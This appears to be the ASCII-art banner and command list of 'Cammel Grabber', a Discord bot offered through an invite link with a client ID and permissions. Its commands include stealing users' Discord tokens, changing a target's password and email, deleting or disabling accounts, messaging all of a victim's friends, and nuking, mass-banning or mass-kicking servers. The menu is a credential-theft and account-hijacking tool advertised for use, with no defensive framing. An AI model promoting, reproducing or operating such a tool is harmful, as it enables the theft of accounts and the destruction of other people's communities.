                                               _______\\__        
                                              (_. _ ._  _/
                                                  '-' \__. /
                                                  /  /    CAMMEL GRABBER
                                                 /  /    .--.  .--.
                                                (  (    / '' \/ '' \   "
                                                 \  \_.'            \   )
                                                  ||               _  './
                                                   |\   \     ___.'\  /
                                                   '-./   .'    \ |/
                                                      \| /       )|\
                                                       |/       // \\
                                                        |\    __//   \\__
                                                       //\\  /__      \__|
                                                        .--_/  \_--.
                                                      /__/      \__\
COMMANDS          CAMMEL GRABBER

              DiSCORD BOT INVITE https://discord.com/api/oauth2/authorize?client_id=918230992873992192&permissions=545460846583&scope=bot
!TokenGrab
!TokenGrabRandoms
!TokenGrabInvite
!DeleteTargetsAccount
!DisableTargetsAccount
!ChangeTargetsPassword = "Password here"
!ChangeTargetsEmail = "Email Here"
!MessageAllFriends = "Message Here"
!DeleteAllOwnedServers
!DeleteTargetsServer = "Server Name Here"
!BanAllMembersTargetserver
!BanTarget = "Targets Username"
!KickAllMembersTargets Server "ServerName Here"
!MakeTargetJoinServerHere "Discord Server Invite Here"
!NukeTargetsServer = "Discord Server Name"
!NukeAllTargetsServers
!MessageAllTargetsServers
!PingAllDiscordServers
!PingDiscordServer = "DiscordServerName"

   ******      **     ****     **** ****     **** ******** **      
  **////**    ****   /**/**   **/**/**/**   **/**/**///// /**      
 **    //    **//**  /**//** ** /**/**//** ** /**/**      /**      
/**         **  //** /** //***  /**/** //***  /**/******* /**      
/**        **********/**  //*   /**/**  //*   /**/**////  /**      
//**    **/**//////**/**   /    /**/**   /    /**/**      /**      
 //****** /**     /**/**        /**/**        /**/********/********
  //////  //      // //         // //         // //////// //////

   ********  *******       **     ******   ******   ******** *******  
  **//////**/**////**     ****   /*////** /*////** /**///// /**////** 
 **      // /**   /**    **//**  /*   /** /*   /** /**      /**   /** 
/**         /*******    **  //** /******  /******  /******* /*******  
/**    *****/**///**   **********/*//// **/*//// **/**////  /**///**  
//**  ////**/**  //** /**//////**/*    /**/*    /**/**      /**  //** 
 //******** /**   //**/**     /**/******* /******* /********/**   //**
  ////////  //     // //      // ///////  ///////  //////// //     // 
